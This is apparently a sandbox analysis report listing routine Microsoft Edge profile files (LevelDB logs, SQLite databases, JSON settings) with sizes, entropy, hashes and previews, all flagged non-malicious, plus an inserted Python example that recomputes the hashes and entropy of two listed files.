                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):305
                                                                                                                                                                Entropy (8bit):5.1708995202464365
                                                                                                                                                                Encrypted:false
SSDEEP:6:iOrvRJ4RM1cNwi23oH+TcwtE/a252KLl5vRJdq2PcNwi23oH+TcwtE/a2ZIFUv:7Pc2ZYeb8xLTdvLZYeb8J2FUv
MD5:122549699760F3B7262DA7447E94322A
SHA1:F3A160B858DF0D82268D3DB3C64FFCE79BB26DE6
SHA-256:3BEC7961CC1756BFCB5BD0A43F574851D1DA2CA1F548CCD31E9790B6BB808CEA
SHA-512:AC572DF7101E160070BC6D8AE399818B9CE1C64897BB5F3A076B1E1F1937AFC0A6845B8473ABE642B6263EDA3D1F02B7BA050DA9465E57F9492F0F3F0D678E6D
Malicious:false
Preview:2025/01/09-08:42:37.970 10e4 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database since it was missing..2025/01/09-08:42:37.993 10e4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database/MANIFEST-000001.

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:OpenPGP Secret Key
Category:dropped
Size (bytes):41
Entropy (8bit):4.704993772857998
Encrypted:false
SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:false
Preview:.|.."....leveldb.BytewiseComparator......

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):115804
Entropy (8bit):5.576914201397461
Encrypted:false
SSDEEP:1536:sU906yxPXfOxr1lhCe1nL/ImL/rBZXJCjPXNt4newXRvVhu:B9LyxPXfOxr1lMe1nL/5L/TXJ6LwXRvu
MD5:860AB9553B8AA0E55F1F79A86E887CC8
SHA1:A44B995E5E1B72FE38FFDCF3AF3435835C7E0B69
SHA-256:3BCE20B13145CAFD659918FDF50C8308E7E5450BC81D0EFE8759439FCB3D237E
SHA-512:E28E6F13B08B2ABDAFE6B6527E317916640438954C4925E45CF512AE075B3A0986791705A5AA27DB4F663920D08B22D790DC6CAE5925602ED87B053F86775544
Malicious:false

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):190385
Entropy (8bit):6.389317422333842
Encrypted:false
SSDEEP:3072:0tmDGYw3Tch5jwWyNVOUa/L/sh97/cGSdkGCgXOVXCagX:ZXjwjgUOL/sdudWdyh
MD5:84E20CE9A144AEFE34C0A94AED1733A5
SHA1:4784134A7E0697BF29169BF0FFEE6DF30453EED1
SHA-256:1A6C602D6292667385A9CB36A988DC8ACBC000B6399E2CE237C10226D86D1F62
SHA-512:A2AFDD194F7887F3725CB823B77CE563A815324C43D49AE7B4898C966C3174EE377994AECEB6040C933D6F17C168EE228DF0273D2559909DAD4AA1C5461C7EB0
Malicious:false

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):24
Entropy (8bit):2.1431558784658327
Encrypted:false
SSDEEP:3:m+l:m
MD5:54CB446F628B2EA4A5BCE5769910512E
SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
Malicious:false
Preview:0\r..m..................

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):72
Entropy (8bit):3.5376346459829513
Encrypted:false
SSDEEP:3:ij9TXl/l+/l9/lxEstllW/lENix:ipjqOsEEA
MD5:1A4F6B6EF85A9E6FCBDD77922FC1BDE2
SHA1:CF9A1A94CE7F1761E75BB41FBA3F1E431301B32B
SHA-256:29A39F054A0E3E0AAD2B74E7614C1D45C34F85EFBE77D87E894FAA3419EA88A0
SHA-512:6DD1C5A650B30F9520CE3F2143E4ECA2F83619361778A9AD85C198BA996EDD831524F12A75F31EA074766A8196EFBFFED4C859B365AD8EE59E9B8FF93EA0138F
Malicious:false
Preview:@...WNRroy retne.........................X....,..................Ko./.

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):5611
Entropy (8bit):3.422463865877326
Encrypted:false
SSDEEP:96:W996Dno6n7pzMUpmV+KtVPVX2J67Z/uh9Xp+e+Vijb9hLl9iSrk1mZZvj1Js6N:DDo6n7pzMU0V+KtVPVX2Jhh9Xp+eKijb
MD5:5701DC3A713B89C3A82C496AFF6CC14F
SHA1:AE4DB8214814B7EC01D4F1CB28B3EEE5735BE9DE
SHA-256:BEEFAD35325CB87C599FEF04A022BFCACF940D1F3260BE601504CEE8412E2A7F
SHA-512:B1D85FBCF412519A03E0ABD26EC8664DC002B86FFBD0EA8A28D485ED0F051DE284A952504E4F85BB15A8C71C42800CA2FC74B2020CA15248CC5A2ED4DD5BEBB4
Malicious:false

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):327
Entropy (8bit):5.161073738660063
Encrypted:false
SSDEEP:6:iOrvREgcT3lyq2PcNwi23oH+TcwtrQMxIFUtJvREgcdHj1ZmwPvREy1RkwOcNwiE:7mZTVyvLZYebCFUtEZD/Sy1R54ZYebtJ
MD5:DB991819E8E029E0AFBA56CFAC0F6C18
SHA1:B96C7CE315FBEC316EBAA184D69DC95431E17993
SHA-256:096AA647CD62AA329AC680A91A02607D463343B858EA62C219D4E0262D8EF7DD
SHA-512:D4907D6484D33C15F33812A94CE2871E7C849AF68AFCBFB990FC65D2CD328306F1E1EC5342F43AFB0B8190C1AC3E0CA90BBEA30804DA2824A22FAD88712FFE78
Malicious:false
Preview:2025/01/09-08:42:29.196 770 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2025/01/09-08:42:29.198 770 Recovering log #3.2025/01/09-08:42:29.201 770 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):1443
Entropy (8bit):3.7749415596969
Encrypted:false
SSDEEP:24:3FxrTu/h7RORMCF3GFqWF/avFnpsAF4unxK/tLp3X2amEtG1ChqXlm+MZRUY6QKo:3Lrq/hAT+/SzFaVLp2FEkChEmN7HOpg
MD5:A6E719B7D6DA35B8E3887FDDE7C96B41
SHA1:4339D68DAF607A267AB82A72DBFBA2DDD3FD9108
SHA-256:503CA5BA2B089F2B41A21211DD2D90A183C97F8BECB404EF4E6F1D2B148C4E0A
SHA-512:3DA5C1043B529B7BBE1D613528511B8F6D90742D453CA2BEF136910DB8E43B55408E25964EA90A2F113E428B59490507A8CC8F830E354C0FCB2EF0419F284D9E
Malicious:false
                                                                                                                                                                Preview:SNSS........Ma.............Ma.......".Ma.............Ma.........Ma.........Ma.........Ma.....!...Ma.................................Ma..Ma.1..,....Ma.$...12804e10_9ef4_4e57_b28a_149d80fec363....Ma.........Ma.......;.........Ma.....Ma.........................Ma.....................5..0....Ma.&...{4B3AC14B-43E5-4896-86E8-9E7D502CE1B5}......Ma............Ma.........................Ma.............Ma.........edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x........._&F+...._&F+.................................. ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8............................................................
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
Category:dropped
Size (bytes):20480
Entropy (8bit):0.44194574462308833
Encrypted:false
SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
MD5:B35F740AA7FFEA282E525838EABFE0A6
SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
Malicious:false
Preview:SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):358
Entropy (8bit):5.162223899361088
Encrypted:false
SSDEEP:6:iOrvRryQL+q2PcNwi23oH+Tcwt7Uh2ghZIFUtJvRtyG1ZmwPvRtyQLVkwOcNwi20:79uvLZYebIhHh2FUtb1/d54ZYebIhHLJ
MD5:CCC47E75AA45BF944CF22B150B911849
SHA1:EC0615438C492D68E1A991DE80D55E9EC5FD23EA
SHA-256:56874881E1A7D54F88CE286B4DC8D74BECC934B2155AA16E8B3D5D69FF0C5523
SHA-512:7593378B8FBA74A1867C6010BFBE451B5FFD7B027328EB0B21B5122D6928999A78172D9ABF00AB54BB5522AB8A9186DC57738FEE7188DD6B90F8C2D3E2FF5304
Malicious:false
Preview:2025/01/09-08:42:28.152 1838 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2025/01/09-08:42:28.154 1838 Recovering log #3.2025/01/09-08:42:28.154 1838 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):358
Entropy (8bit):5.162223899361088
Encrypted:false
SSDEEP:6:iOrvRryQL+q2PcNwi23oH+Tcwt7Uh2ghZIFUtJvRtyG1ZmwPvRtyQLVkwOcNwi20:79uvLZYebIhHh2FUtb1/d54ZYebIhHLJ
MD5:CCC47E75AA45BF944CF22B150B911849
SHA1:EC0615438C492D68E1A991DE80D55E9EC5FD23EA
SHA-256:56874881E1A7D54F88CE286B4DC8D74BECC934B2155AA16E8B3D5D69FF0C5523
SHA-512:7593378B8FBA74A1867C6010BFBE451B5FFD7B027328EB0B21B5122D6928999A78172D9ABF00AB54BB5522AB8A9186DC57738FEE7188DD6B90F8C2D3E2FF5304
Malicious:false
Preview:2025/01/09-08:42:28.152 1838 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2025/01/09-08:42:28.154 1838 Recovering log #3.2025/01/09-08:42:28.154 1838 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:modified
Size (bytes):270336
Entropy (8bit):0.0018164538716206493
Encrypted:false
SSDEEP:3:MsEllllkEthXllkl2zEZlxK//:/M/xT02zSKX
MD5:635735B659072C7A74C84B8EEC641919
SHA1:57B8F7389F50E8E99A68FC7BEE32CC22C3E27E2A
SHA-256:E06B8202DC1D78E107522178FCC2F97810A184755E24713EEB1DEC4558084ABF
SHA-512:22F7E6B69BA38A8760E1CF62B4F206E152BC2222565E7A0B71DF610B66B49C16ECA7CDBCB884F9540BE68866E6A0B73A98E601FC05929B4BA1BB761651F57B1D
Malicious:false
Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):270336
Entropy (8bit):0.0012471779557650352
Encrypted:false
SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
MD5:F50F89A0A91564D0B8A211F8921AA7DE
SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
Malicious:false
Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):270336
Entropy (8bit):0.0012471779557650352
Encrypted:false
SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
MD5:F50F89A0A91564D0B8A211F8921AA7DE
SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
Malicious:false
Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):437
Entropy (8bit):5.234490707601754
Encrypted:false
SSDEEP:12:7mQyvLZYebvqBQFUtE0p/SX1R54ZYebvqBvJ:75YlYebvZgU1DoYebvk
MD5:B64101A5D966896669F6C098E7476195
SHA1:72269813F2577A0CA31F991760B9324BE384C2AB
SHA-256:87A825A9B70FD3FC10F3B58E526B79230F7BC7340544E2104E03D7F6D5DB5160
SHA-512:09C97104697FE72855367DAFBAC19B87539B79BDE539061A3AA93F5A009C182F17F05F63680965AEC34220948C8FA87E7E4500F76B39BE3995AB92607E9474FA
Malicious:false
Preview:2025/01/09-08:42:29.249 770 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2025/01/09-08:42:29.250 770 Recovering log #3.2025/01/09-08:42:29.253 770 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):437
Entropy (8bit):5.234490707601754
Encrypted:false
SSDEEP:12:7mQyvLZYebvqBQFUtE0p/SX1R54ZYebvqBvJ:75YlYebvZgU1DoYebvk
MD5:B64101A5D966896669F6C098E7476195
SHA1:72269813F2577A0CA31F991760B9324BE384C2AB
SHA-256:87A825A9B70FD3FC10F3B58E526B79230F7BC7340544E2104E03D7F6D5DB5160
SHA-512:09C97104697FE72855367DAFBAC19B87539B79BDE539061A3AA93F5A009C182F17F05F63680965AEC34220948C8FA87E7E4500F76B39BE3995AB92607E9474FA
Malicious:false
Preview:2025/01/09-08:42:29.249 770 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2025/01/09-08:42:29.250 770 Recovering log #3.2025/01/09-08:42:29.253 770 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):2
Entropy (8bit):1.0
Encrypted:false
SSDEEP:3:H:H
MD5:D751713988987E9331980363E24189CE
SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:false
Preview:[]

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):2
Entropy (8bit):1.0
Encrypted:false
SSDEEP:3:H:H
MD5:D751713988987E9331980363E24189CE
SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:false
Preview:[]

                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2
                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:[]
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2
                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:[]
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2
                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:[]
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2
                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:[]
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):40
                                                                                                                                                                Entropy (8bit):4.1275671571169275
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"SDCH":{"dictionaries":{},"version":2}}
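The hash and Entropy (8bit) fields in these dropped-file records can be recomputed directly for the two files whose complete contents are visible in the Preview field: the 2-byte `[]` and the 40-byte SDCH settings file. The Python below is an added example and not part of the Joe Sandbox report or its tooling; the file bytes are taken from the Preview field, the expected values from the records above, and the 7.0 bits/byte cut-off for flagging content as likely compressed or encrypted is an assumed illustrative value, not the threshold the sandbox uses for its Encrypted flag.

```python
import hashlib
import math
from collections import Counter

# Contents of two dropped files reconstructed from the report's Preview field.
# Both are short enough that the preview is the whole file (Size matches).
DROPPED_FILES = {
    "empty_json_array": b"[]",
    "sdch_settings": b'{"SDCH":{"dictionaries":{},"version":2}}',
}

# Values as printed in the report records (Size, Entropy (8bit), MD5, SHA1, SHA-256).
REPORTED = {
    "empty_json_array": {
        "size": 2,
        "entropy": 1.0,
        "md5": "D751713988987E9331980363E24189CE",
        "sha1": "97D170E1550EEE4AFC0AF065B78CDA302A97674C",
        "sha256": "4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945",
    },
    "sdch_settings": {
        "size": 40,
        "entropy": 4.1275671571169275,
        "md5": "20D4B8FA017A12A108C87F540836E250",
        "sha1": "1AC617FAC131262B6D3CE1F52F5907E31D5F6F00",
        "sha256": "6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D",
    },
}

# Assumed illustrative threshold (not Joe Sandbox's): bytes whose distribution is
# this close to uniform are indistinguishable from compressed or encrypted data.
HIGH_ENTROPY = 7.0


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte: 0.0 for one repeated value, 8.0 for uniform."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def digests(data: bytes) -> dict:
    """Upper-case hex digests in the same families the report prints."""
    return {
        "md5": hashlib.md5(data).hexdigest().upper(),
        "sha1": hashlib.sha1(data).hexdigest().upper(),
        "sha256": hashlib.sha256(data).hexdigest().upper(),
        "sha512": hashlib.sha512(data).hexdigest().upper(),
    }


def verify(name: str) -> dict:
    """Recompute size, entropy and digests for one file and compare with the report."""
    data = DROPPED_FILES[name]
    rep = REPORTED[name]
    d = digests(data)
    ent = shannon_entropy(data)
    return {
        "size_ok": len(data) == rep["size"],
        "entropy": ent,
        "entropy_ok": math.isclose(ent, rep["entropy"], rel_tol=1e-9),
        "md5_ok": d["md5"] == rep["md5"],
        "sha1_ok": d["sha1"] == rep["sha1"],
        "sha256_ok": d["sha256"] == rep["sha256"],
        "likely_encrypted": ent >= HIGH_ENTROPY,
        "sha512": d["sha512"],
    }


def all_match(name: str) -> bool:
    """True when every field the report prints agrees with the recomputed value."""
    r = verify(name)
    return all(r[k] for k in ("size_ok", "entropy_ok", "md5_ok", "sha1_ok", "sha256_ok"))


if __name__ == "__main__":
    for name in DROPPED_FILES:
        r = verify(name)
        print(f"{name}: entropy={r['entropy']:.6f} match={all_match(name)} "
              f"likely_encrypted={r['likely_encrypted']}")
```

Two caveats when reading the entropy column. A file of n distinct bytes cannot exceed log2(n) bits per byte, so the 1.0 reported for `[]` is the maximum a 2-byte file can reach and says nothing about its content; the heuristic only means something on files of a few hundred bytes or more. At the other end, a value as low as the 0.39 reported for the 36864-byte SQLite database (nine 4096-byte pages) indicates a file dominated by a single byte value, which is what a freshly created database with mostly empty pages looks like.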
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
Category:dropped
Size (bytes):36864
Entropy (8bit):0.3886039372934488
Encrypted:false
SSDEEP:24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
MD5:DEA619BA33775B1BAEEC7B32110CB3BD
SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
Malicious:false
                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):40
                                                                                                                                                                Entropy (8bit):4.1275671571169275
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):80
                                                                                                                                                                Entropy (8bit):3.4921535629071894
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                                SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:*...#................version.1..namespace-..&f.................&f...............
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):425
                                                                                                                                                                Entropy (8bit):5.263495318842846
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:7KlY1yvLZYebvqBZFUt0l+J/WlBR54ZYebvqBaJ:70iYlYebvygO+iBDoYebvL
                                                                                                                                                                MD5:D6B0F7158A5E02EC06C3EABD980BB7B3
                                                                                                                                                                SHA1:D1BB4A030F62713FD0C6C5297CF376705CA631F2
                                                                                                                                                                SHA-256:F20C313905129877A288F30E6B16517BE714A7B4D7AB4F7E4766CC6E935AC466
                                                                                                                                                                SHA-512:465686F10A2B5A8958293652A12DF0C1C2CD63FA7284B09ABD0B9E85172E57329AC8E143C3793A1DBE9E7D9CAC1A25F7B546B097479E2F99BBF11D26A039ADB3
                                                                                                                                                                Malicious:false
